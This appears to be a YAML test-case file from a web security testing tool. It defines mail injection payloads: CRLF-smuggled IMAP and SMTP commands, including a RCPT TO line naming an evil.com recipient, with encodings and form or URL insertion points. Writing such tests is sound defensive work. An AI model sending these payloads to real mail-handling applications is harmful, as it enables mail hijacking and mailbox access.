gitex2026/AttackSurface/dist/testcases/owasp/mail-injection.yml
2026-04-24 19:18:37 +00:00

13 lines
232 B
YAML

payload:
- "\r\nV100 CAPABILITY\r\nV101 FETCH 4791"
- "\r\nQUIT\r\n"
- "\nRCPT TO: test@evil.com\n"
encoder:
- Base64Flat
- URL
placeholder:
- URLPath
- URLParam
- HTMLForm
- HTMLMultipartForm
type: Mail Injection